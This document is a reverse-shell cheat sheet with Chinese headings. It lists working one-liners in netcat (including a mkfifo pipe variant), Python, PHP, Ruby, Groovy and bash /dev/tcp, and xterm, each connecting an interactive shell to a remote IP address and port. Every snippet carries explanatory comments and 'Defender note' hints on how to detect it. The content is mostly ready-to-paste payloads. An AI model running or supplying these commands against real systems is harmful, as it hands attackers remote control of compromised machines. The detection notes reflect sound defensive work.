反弹shell
nc反弹
# netcat reverse shell: connects out to 192.168.10.128:6666 and, via -e, attaches an
# interactive /bin/sh to that connection so the remote listener drives the shell.
# Defender note: an outbound nc connection with a shell bound to the socket is the
# signature to alert on; egress filtering of arbitrary ports limits it.
nc -e /bin/sh 192.168.10.128 6666
# Some nc builds (the non-traditional variants) have no -e option; the following achieves the same effect without it
# Named-pipe form: nc writes whatever it receives into the FIFO /tmp/f, cat feeds that
# into an interactive sh, and the shell's stdout/stderr (2>&1) are piped back through nc.
# Defender note: a FIFO under /tmp with cat, sh and nc chained on it is an unusual
# process tree and a file-system artefact worth flagging.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 6666 >/tmp/f
python反弹
# Python reverse shell: opens a TCP connection to 192.168.10.128:6666, duplicates the
# socket onto file descriptors 0/1/2 (stdin/stdout/stderr), then starts an
# interactive bash whose I/O therefore flows over the socket.
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.10.128" , 6666 ))
# After these three dup2 calls every read from stdin and write to stdout/stderr
# goes to the socket instead of the terminal.
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
# subprocess.call blocks until bash exits; the child inherits fds 0-2, i.e. the socket.
# Defender note: a bash process whose fds 0, 1 and 2 all resolve to the same TCP
# socket, parented by a python interpreter, is a high-fidelity detection signature.
p = subprocess.call([ "/bin/bash" , "-i" ])
php反弹shell
# PHP reverse shell: fsockopen connects to 192.168.2.130:4444, and exec() runs an
# interactive sh whose `<&3 >&3 2>&3` redirections assume the socket landed on fd 3
# of the php process. Defender note: a php CLI process spawning sh with its stdio on
# a network socket is the signal to alert on.
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby反弹shell
# Ruby reverse shell: opens a TCP socket to 10.0.0.1:1234, takes its fd number (to_i),
# and execs an interactive /bin/sh with stdin/stdout/stderr redirected onto that fd.
# Defender note: the ruby process is replaced by sh (exec), so look for a shell whose
# stdio is a socket and whose parent is whatever launched ruby.
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i
<&%d >&%d 2>&%d",f,f,f)'
java反弹shell
// Groovy rather than plain Java (`as String[]` is a Groovy cast) reverse shell: the JVM
// spawns bash, which opens /dev/tcp/10.0.0.1/2002 as fd 5, reads commands line by line
// from it and sends each command's stdout/stderr back over the same fd.
// Defender note: a bash child of a JVM process opening /dev/tcp is a strong signal;
// /dev/tcp is a bash builtin pseudo-device, so no separate network tool is involved.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read
line; do \$line 2>&5 >&5; done"] as String[])
// Blocks until the spawned bash exits.
p.waitFor()
xterm反弹shell
# X11 reverse shell: xterm runs on this host but draws its window on the X server at
# 10.0.0.1 display :1 (TCP 6001 by X11 convention), so the remote display owner gets
# the terminal. Only works if that X server accepts remote clients.
# Defender note: outbound traffic to the X11 port range (6000-6063) from a server is
# rarely legitimate and is easy to block at egress.
xterm -display 10.0.0.1:1